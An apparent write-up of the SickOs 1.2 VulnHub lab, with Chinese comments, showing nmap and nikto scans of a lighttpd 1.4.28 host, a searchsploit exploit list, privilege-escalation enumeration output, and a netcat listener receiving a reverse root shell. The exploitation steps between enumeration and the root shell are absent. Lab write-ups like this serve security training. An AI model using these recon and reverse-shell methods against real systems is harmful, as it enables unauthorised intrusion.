┌──(kali㉿kali)-[~] └─$ sudo nmap -sn 192.168.56.0/24 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:28 EDT Nmap scan report for 192.168.56.1 Host is up (0.00026s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.56.2 Host is up (0.00014s latency). MAC Address: 00:50:56:EC:CE:9E (VMware) Nmap scan report for 192.168.56.136 Host is up (0.00012s latency). MAC Address: 00:0C:29:F7:DE:A9 (VMware) Nmap scan report for 192.168.56.254 Host is up (0.00083s latency). MAC Address: 00:50:56:E2:96:B0 (VMware) Nmap scan report for 192.168.56.132 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 2.09 seconds
Port scan
1 2 3 4 5 6 7 8 9 10 11 12
┌──(kali㉿kali)-[~] └─$ sudo nmap -p- --min-rate=10000 192.168.56.136 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:31 EDT Nmap scan report for 192.168.56.136 Host is up (0.0012s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:F7:DE:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -O -p22,80 192.168.56.136 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:32 EDT Nmap scan report for 192.168.56.136 Host is up (0.00093s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http lighttpd 1.4.28 MAC Address: 00:0C:29:F7:DE:A9 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.75 seconds
80端口运行的lighttpd服务版本是1.4.28,其他没啥信息了。
UDP
1 2 3 4 5 6 7 8 9 10
┌──(kali㉿kali)-[~] └─$ sudo nmap -sU 192.168.56.136 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:35 EDT Nmap scan report for 192.168.56.136 Host is up (0.00056s latency). All 1000 scanned ports on 192.168.56.136 are in ignored states. Not shown: 1000 open|filtered udp ports (no-response) MAC Address: 00:0C:29:F7:DE:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 21.73 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap --script=vuln 192.168.56.136 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:36 EDT Nmap scan report for 192.168.56.136 Host is up (0.0017s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-enum: |_ /test/: Test page |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-dombased-xss: Couldn't find any DOM based XSS. MAC Address: 00:0C:29:F7:DE:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 87.09 seconds
只有一个可能存在的DOS漏洞,没啥帮助。
vuln search
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(kali㉿kali)-[~] └─$ searchsploit lighttpd 1.4 -------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------- --------------------------------- lighttpd - Denial of Service (PoC) | linux/dos/18295.txt Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities | windows/remote/30322.rb Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution | multiple/remote/4391.c Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution | linux/remote/4437.c lighttpd 1.4.31 - Denial of Service (PoC) | linux/dos/22902.sh Lighttpd 1.4.x - mod_userdir Information Disclosure | linux/remote/31396.txt lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service | linux/dos/33591.sh Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure | multiple/remote/8786.txt -------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
┌──(kali㉿kali)-[~] └─$ sudo nikto -h 192.168.56.136 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.56.136 + Target Hostname: 192.168.56.136 + Target Port: 80 + Start Time: 2023-04-19 11:40:45 (GMT-4) --------------------------------------------------------------------------- + Server: lighttpd/1.4.28 + /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21. + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST . + /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184 + /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184 + /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184 + /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184 + /test/: Directory indexing found. + /test/: This might be interesting. + /#wp-config.php#: #wp-config.php# file found. This file contains the credentials. + 8102 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2023-04-19 11:41:11 (GMT-4) (26 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
══╣ Some home ssh config file was found /usr/share/doc/openssh-client/examples/sshd_config AuthorizedKeysFile .ssh/authorized_keys Subsystem sftp /usr/libexec/sftp-server
╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 3486 Mar 28 2013 /etc/skel/.bashrc -rw-r--r-- 1 john john 3486 Mar 30 2016 /home/john/.bashrc
-rw-r--r-- 1 root root 675 Mar 28 2013 /etc/skel/.profile -rw-r--r-- 1 john john 675 Mar 30 2016 /home/john/.profile
╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
┌──(kali㉿kali)-[~] └─$ sudo nc -lvp 443 [sudo] password for kali: listening on [any] 443 ... 192.168.56.136: inverse host lookup failed: Host name lookup failure connect to [192.168.56.132] from (UNKNOWN) [192.168.56.136] 57899 bash: no job control in this shell root@ubuntu:~# whoami whoami root root@ubuntu:~# cd ~ cd ~ root@ubuntu:~# ls ls 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt chkrootkit-0.49 newRule root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!. root@ubuntu:~#